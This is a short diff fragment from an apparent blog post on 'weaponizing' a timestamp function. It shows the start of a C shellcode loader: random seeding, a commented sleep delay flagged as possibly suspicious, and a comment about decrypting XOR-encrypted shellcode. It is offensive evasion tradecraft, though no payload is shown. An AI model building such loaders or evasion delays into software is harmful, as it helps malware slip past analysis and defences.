shubakki/shubakki.github.io/content/posts/01WeaponizingGetTimestamp.md

 int main()
 {
     // seed our generator
+    // defaultseed could be any seed you choose
-    srand( defaultseed );
+    //but for obvious reasons i recommend using the __TIME__ macro for that. srand( defaultseed );

-	__alt_sleepms( SLEEPTIME * 12 );
+	// initial timeout ? (could be extremely sus) __alt_sleepms( SLEEPTIME * 12 );

     // decrypt our xor encrypted shellcode